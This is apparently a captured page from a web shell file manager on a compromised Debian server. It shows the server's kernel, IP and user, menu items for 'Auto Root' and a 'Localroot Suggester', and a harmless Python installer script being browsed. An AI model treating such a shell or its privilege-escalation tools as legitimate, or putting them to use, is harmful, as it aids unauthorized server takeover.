Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
Python-3.10.14 /
Mac /
BuildScript /
scripts /
Delete
Unzip
Name
Size
Permission
Date
Action
postflight.documentation
879
B
-rwxr-xr-x
2024-03-19 22:46
postflight.ensurepip
2.39
KB
-rwxr-xr-x
2024-03-19 22:46
postflight.framework
895
B
-rwxr-xr-x
2024-03-19 22:46
postflight.patch-profile
2.91
KB
-rwxr-xr-x
2024-03-19 22:46
Save
Rename
#!/bin/sh PYVER="@PYVER@" FWK="/Library/Frameworks/Python.framework/Versions/${PYVER}" FWK_DOCDIR_SUBPATH="Resources/English.lproj/Documentation" FWK_DOCDIR="${FWK}/${FWK_DOCDIR_SUBPATH}" APPDIR="/Applications/Python ${PYVER}" SHARE_DIR="${FWK}/share" SHARE_DOCDIR="${SHARE_DIR}/doc/python${PYVER}" SHARE_DOCDIR_TO_FWK="../../.." # make link in /Applications/Python m.n/ for Finder users if [ -d "${APPDIR}" ]; then ln -fhs "${FWK_DOCDIR}/index.html" "${APPDIR}/Python Documentation.html" if [ "${COMMAND_LINE_INSTALL}" != 1 ]; then open "${APPDIR}" || true # open the applications folder fi fi # make share/doc link in framework for command line users if [ -d "${SHARE_DIR}" ]; then mkdir -m 775 -p "${SHARE_DOCDIR}" # make relative link to html doc directory ln -fhs "${SHARE_DOCDIR_TO_FWK}/${FWK_DOCDIR_SUBPATH}" "${SHARE_DOCDIR}/html" fi